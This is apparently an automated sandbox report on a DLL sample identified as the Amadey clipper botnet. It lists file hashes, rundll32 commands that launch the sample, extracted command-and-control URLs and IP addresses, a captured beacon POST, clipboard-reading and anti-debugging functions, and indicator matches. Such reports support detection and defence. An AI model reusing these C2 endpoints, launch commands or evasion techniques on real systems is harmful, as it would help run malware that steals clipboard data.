Edit tour

Windows Analysis Report
D72j5I83wU.dll

Overview

General Information

Sample name:	D72j5I83wU.dll renamed because original name is a hash value
Original sample name:	c2f3fbbbe6d5f48a71b6b168b1485866.dll
Analysis ID:	1574266
MD5:	c2f3fbbbe6d5f48a71b6b168b1485866
SHA1:	1cd56cfc2dc07880b65bd8a1f5b7147633f5d553
SHA256:	c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839
Tags:	Amadeydlluser-abuse_ch
Infos:

Detection

Amadey

Score:	92
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected Amadeys Clipper DLL

C2 URLs / IPs found in malware configuration

Contains functionality for read data from the clipboard

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Program does not show much activity (idle)

Sample execution stops while process was sleeping (likely an evasion)

Uses 32bit PE files

Classification

Process Tree

System is w10x64

loaddll32.exe (PID: 7864 cmdline: loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll" MD5: 51E6071F9CBA48E79F10C84515AAE618)

conhost.exe (PID: 7872 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7916 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

rundll32.exe (PID: 7940 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1 MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 7924 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8060 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8076 cmdline: rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8180 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 8188 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z MD5: 889B99C52A60DD49227C5E485A016679)

rundll32.exe (PID: 6872 cmdline: rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main MD5: 889B99C52A60DD49227C5E485A016679)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Malware Configuration

Threatname: Amadey

{"C2 url": "185.81.68.148/8Fvu5jh4DbS/index.php", "Version": "5.10"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
D72j5I83wU.dll	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.rundll32.exe.6ec40000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security
7.2.rundll32.exe.6ec40000.0.unpack	JoeSecurity_Amadey_3	Yara detected Amadey\'s Clipper DLL	Joe Security

Suricata Signatures

ETPRO MALWARE Amadey CnC Activity M7

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-13T07:56:37.610787+0100	2856151	1	A Network Trojan was detected	192.168.2.10	49726	185.81.68.148	80	TCP
2024-12-13T07:56:40.220798+0100	2856151	1	A Network Trojan was detected	192.168.2.10	49733	185.81.68.148	80	TCP

Code function: 7_2_6EC41EC0 std::_Xinvalid_argument,InternetOpenW,InternetConnectA,HttpOpenRequestA,HttpSendRequestA,InternetReadFile,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

7_2_6EC41EC0

Source: unknown

HTTP traffic detected: POST /7vhfjke3/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.81.68.147Content-Length: 5Cache-Control: no-cacheData Raw: 77 6c 74 3d 31 Data Ascii: wlt=1

Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/
Source: rundll32.exe, 00000007.00000002.3176039165.000000000340A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.php
Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002F31000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpm
Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.147/7vhfjke3/index.phpmUtcs
Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/2
Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000007.00000002.3176039165.000000000343F000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php
Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.php.
Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpF
Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpH
Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpJ
Source: rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/8Fvu5jh4DbS/index.phpR
Source: rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.81.68.148/R

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC431B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6EC431B0

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC431B0 OpenClipboard,GetClipboardData,GlobalLock,WideCharToMultiByte,WideCharToMultiByte,GlobalUnlock,CloseClipboard,

7_2_6EC431B0

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC431B0		7_2_6EC431B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC51AB1		7_2_6EC51AB1

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EC473B0 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EC45D90 appears 103 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 6EC46B05 appears 47 times

Source: D72j5I83wU.dll

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL

Source: classification engine

Classification label: mal92.troj.spyw.evad.winDLL@18/0@0/2

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7872:120:WilError_03

Source: D72j5I83wU.dll

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\loaddll32.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z

Source: D72j5I83wU.dll	Virustotal: Detection: 65%
Source: D72j5I83wU.dll	ReversingLabs: Detection: 47%

Source: unknown	Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll"
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\D72j5I83wU.dll,Main	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@$$QAV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",??4CClipperDLL@@QAEAAV0@ABV0@@Z	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",Main	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1	Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\loaddll32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32

Jump to behavior

Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: D72j5I83wU.dll	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: D72j5I83wU.dll

Static PE information: DYNAMIC_BASE, NX_COMPAT

Source: D72j5I83wU.dll

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: D72j5I83wU.dll	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe TID: 8080	Thread sleep count: 167 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 8080	Thread sleep time: -167000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7192	Thread sleep count: 163 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe TID: 7192	Thread sleep time: -163000s >= -30000s	Jump to behavior

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC4BCEE FindFirstFileExW,

7_2_6EC4BCEE

Source: C:\Windows\System32\loaddll32.exe

Thread delayed: delay time: 120000

Jump to behavior

Source: rundll32.exe, 00000007.00000002.3176039165.0000000003441000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8
Source: rundll32.exe, 00000007.00000002.3176039165.000000000347D000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002F4B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: rundll32.exe, 00000007.00000002.3176039165.000000000347D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW07

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC47288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

7_2_6EC47288

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC4A254 mov eax, dword ptr fs:[00000030h]		7_2_6EC4A254
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC4B881 mov eax, dword ptr fs:[00000030h]		7_2_6EC4B881

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC4D218 GetProcessHeap,

7_2_6EC4D218

Source: all processes

Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC47288 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6EC47288
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC46B1A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_6EC46B1A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_6EC49820 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_6EC49820

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.147 80			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 185.81.68.148 80			Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\D72j5I83wU.dll",#1

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC470A7 cpuid

7_2_6EC470A7

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_6EC473F8 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

7_2_6EC473F8

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: D72j5I83wU.dll, type: SAMPLE
Source: Yara match	File source: 11.2.rundll32.exe.6ec40000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.rundll32.exe.6ec40000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	111 Process Injection	11 Virtualization/Sandbox Evasion	OS Credential Dumping	1 System Time Discovery	Remote Services	1 Archive Collected Data	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	111 Process Injection	LSASS Memory	21 Security Software Discovery	Remote Desktop Protocol	2 Clipboard Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	11 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Obfuscated Files or Information	NTDS	1 File and Directory Discovery	Distributed Component Object Model	Input Capture	11 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Rundll32	LSA Secrets	12 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
D72j5I83wU.dll	65%	Virustotal		Browse
D72j5I83wU.dll	47%	ReversingLabs	Win32.Trojan.Amadey

Source	Detection	Scanner	Label
http://185.81.68.148/2	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpm	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.phpmUtcs	100%	Avira URL Cloud	phishing
http://185.81.68.148/R	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpR	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpH	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpF	100%	Avira URL Cloud	phishing
http://185.81.68.147/7vhfjke3/index.php	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.phpJ	100%	Avira URL Cloud	phishing
http://185.81.68.147/	100%	Avira URL Cloud	phishing
http://185.81.68.148/8Fvu5jh4DbS/index.php.	100%	Avira URL Cloud	phishing

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
s-part-0035.t-0009.t-msedge.net	13.107.246.63	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.81.68.147/7vhfjke3/index.php	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php	true	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://185.81.68.147/7vhfjke3/index.phpm	rundll32.exe, 0000000B.00000002.3176052038.0000000002F31000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.147/7vhfjke3/index.phpmUtcs	rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/2	rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/R	rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpR	rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpH	rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpF	rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.phpJ	rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.147/	rundll32.exe, 00000007.00000002.3176039165.0000000003453000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://185.81.68.148/8Fvu5jh4DbS/index.php.	rundll32.exe, 0000000B.00000002.3176052038.0000000002EEA000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.81.68.147	unknown	Finland		50108	KLNOPT-ASFI	true
185.81.68.148	unknown	Finland		50108	KLNOPT-ASFI	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574266
Start date and time:	2024-12-13 07:55:28 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	D72j5I83wU.dll renamed because original name is a hash value
Original Sample Name:	c2f3fbbbe6d5f48a71b6b168b1485866.dll
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winDLL@18/0@0/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 8 Number of non-executed functions: 28
Cookbook Comments:	Found application associated with file extension: .dll Sleeps bigger than 100000000ms are automatically reduced to 1000ms Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded IPs from analysis (whitelisted): 13.107.246.63, 4.245.163.56
Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, otelrules.afd.azureedge.net, ctldl.windowsupdate.com, azureedge-t-prod.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
185.81.68.147	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php?wal=1
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.147/7vhfjke3/index.php
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.147/VzCAHn.php?1DC30FADAFF92643095942
	file.exe	Get hash	malicious	RedLine	Browse	185.81.68.147/tizhyf/gate.php?0CD020845398340779059
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, RedLine, Stealc, Vidar	Browse	185.81.68.147/tizhyf/gate.php?2DB3A69DE7692371543510
185.81.68.148	hoPazBDFG9.dll	Get hash	malicious	Amadey	Browse	185.81.68.148/8Fvu5jh4DbS/index.php?wal=1
	tOuVwTJrau.exe	Get hash	malicious	Amadey	Browse	185.81.68.148/8Fvu5jh4DbS/index.php
	yINR7uQlPr.exe	Get hash	malicious	Amadey, RedLine	Browse	185.81.68.148/8Fvu5jh4DbS/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
